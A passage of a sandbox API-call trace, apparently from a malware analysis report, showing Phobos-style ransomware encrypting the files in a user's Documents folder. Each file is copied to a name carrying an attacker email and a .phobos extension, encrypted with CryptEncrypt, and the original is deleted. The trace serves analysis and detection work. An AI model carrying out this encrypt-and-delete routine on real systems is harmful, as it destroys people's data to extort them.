[0196.673] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x5b70, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x5b70, lpOverlapped=0x0) returned 1 [0196.674] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0196.674] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.674] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0196.674] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.674] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0196.674] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.674] CloseHandle (hObject=0xb0) returned 1 [0196.674] CloseHandle (hObject=0x124) returned 1 [0196.674] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AePBE.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\aepbe.xlsx")) returned 1 [0196.675] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.675] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B6_2-Vnlq39Px6c.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b6_2-vnlq39px6c.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.676] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=61946) returned 1 [0196.676] CloseHandle (hObject=0x124) returned 1 [0196.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B6_2-Vnlq39Px6c.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b6_2-vnlq39px6c.xlsx")) returned 0x20 [0196.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B6_2-Vnlq39Px6c.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b6_2-vnlq39px6c.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B6_2-Vnlq39Px6c.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b6_2-vnlq39px6c.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.676] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.676] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B6_2-Vnlq39Px6c.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b6_2-vnlq39px6c.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.677] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.677] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.677] ReadFile (in: hFile=0x124, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xf1fa, lpOverlapped=0x0) returned 1 [0196.678] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf200, dwBufLen=0xf200 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf200) returned 1 [0196.679] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf200, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf200, lpOverlapped=0x0) returned 1 [0196.680] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0196.680] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.680] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0196.680] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.680] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0196.681] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.681] CloseHandle (hObject=0x124) returned 1 [0196.681] CloseHandle (hObject=0xb0) returned 1 [0196.681] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B6_2-Vnlq39Px6c.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b6_2-vnlq39px6c.xlsx")) returned 1 [0196.682] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.682] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyb_du.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cyb_du.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.683] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=56966) returned 1 [0196.683] CloseHandle (hObject=0xb0) returned 1 [0196.683] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyb_du.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cyb_du.docx")) returned 0x20 [0196.683] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyb_du.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cyb_du.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyb_du.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cyb_du.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.683] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.683] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyb_du.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cyb_du.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.684] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.684] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.684] ReadFile (in: hFile=0xb0, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xde86, lpOverlapped=0x0) returned 1 [0196.685] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xde90, dwBufLen=0xde90 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xde90) returned 1 [0196.686] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xde90, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xde90, lpOverlapped=0x0) returned 1 [0196.687] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0196.687] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.687] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0196.687] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.687] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0196.688] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.688] CloseHandle (hObject=0xb0) returned 1 [0196.688] CloseHandle (hObject=0x124) returned 1 [0196.688] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\cyb_du.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cyb_du.docx")) returned 1 [0196.689] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c_3uVV.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c_3uvv.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.690] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=87524) returned 1 [0196.690] CloseHandle (hObject=0x124) returned 1 [0196.690] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c_3uVV.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c_3uvv.pdf")) returned 0x20 [0196.690] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c_3uVV.pdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c_3uvv.pdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c_3uVV.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c_3uvv.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.690] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.690] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c_3uVV.pdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c_3uvv.pdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.691] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.691] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.691] ReadFile (in: hFile=0x124, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x155e4, lpOverlapped=0x0) returned 1 [0196.806] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x155f0, dwBufLen=0x155f0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x155f0) returned 1 [0196.807] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x155f0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x155f0, lpOverlapped=0x0) returned 1 [0196.808] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0196.808] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.808] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0196.808] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0196.808] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0196.808] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.808] CloseHandle (hObject=0x124) returned 1 [0196.809] CloseHandle (hObject=0xb0) returned 1 [0196.929] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\c_3uVV.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c_3uvv.pdf")) returned 1 [0196.931] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dHAzF3f9DE9t2ADhYIoo.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dhazf3f9de9t2adhyioo.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.932] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=46171) returned 1 [0196.932] CloseHandle (hObject=0xb0) returned 1 [0196.932] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dHAzF3f9DE9t2ADhYIoo.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dhazf3f9de9t2adhyioo.xlsx")) returned 0x20 [0196.932] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dHAzF3f9DE9t2ADhYIoo.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dhazf3f9de9t2adhyioo.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.932] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dHAzF3f9DE9t2ADhYIoo.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dhazf3f9de9t2adhyioo.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.932] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.932] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.932] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dHAzF3f9DE9t2ADhYIoo.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dhazf3f9de9t2adhyioo.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.934] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.934] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.934] ReadFile (in: hFile=0xb0, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb45b, lpOverlapped=0x0) returned 1 [0196.935] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb460, dwBufLen=0xb460 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb460) returned 1 [0196.936] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb460, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb460, lpOverlapped=0x0) returned 1 [0196.938] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0196.938] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.938] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0196.938] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0196.938] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0196.938] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.938] CloseHandle (hObject=0xb0) returned 1 [0196.938] CloseHandle (hObject=0x124) returned 1 [0196.938] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dHAzF3f9DE9t2ADhYIoo.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dhazf3f9de9t2adhyioo.xlsx")) returned 1 [0196.939] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FrA5h-q 5W4ULy.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fra5h-q 5w4uly.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.940] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=79819) returned 1 [0196.940] CloseHandle (hObject=0x124) returned 1 [0196.940] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FrA5h-q 5W4ULy.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fra5h-q 5w4uly.xlsx")) returned 0x20 [0196.940] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FrA5h-q 5W4ULy.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fra5h-q 5w4uly.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FrA5h-q 5W4ULy.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fra5h-q 5w4uly.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.941] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.941] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FrA5h-q 5W4ULy.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fra5h-q 5w4uly.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.941] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.941] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.941] ReadFile (in: hFile=0x124, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x137cb, lpOverlapped=0x0) returned 1 [0196.946] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x137d0, dwBufLen=0x137d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x137d0) returned 1 [0196.947] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x137d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x137d0, lpOverlapped=0x0) returned 1 [0196.949] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328a8) returned 1 [0196.949] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.949] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0196.949] CryptDestroyKey (hKey=0xa328a8) returned 1 [0196.949] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0196.949] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.949] CloseHandle (hObject=0x124) returned 1 [0196.949] CloseHandle (hObject=0xb0) returned 1 [0196.949] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FrA5h-q 5W4ULy.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fra5h-q 5w4uly.xlsx")) returned 1 [0196.950] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GNE8Qh4.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gne8qh4.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.951] 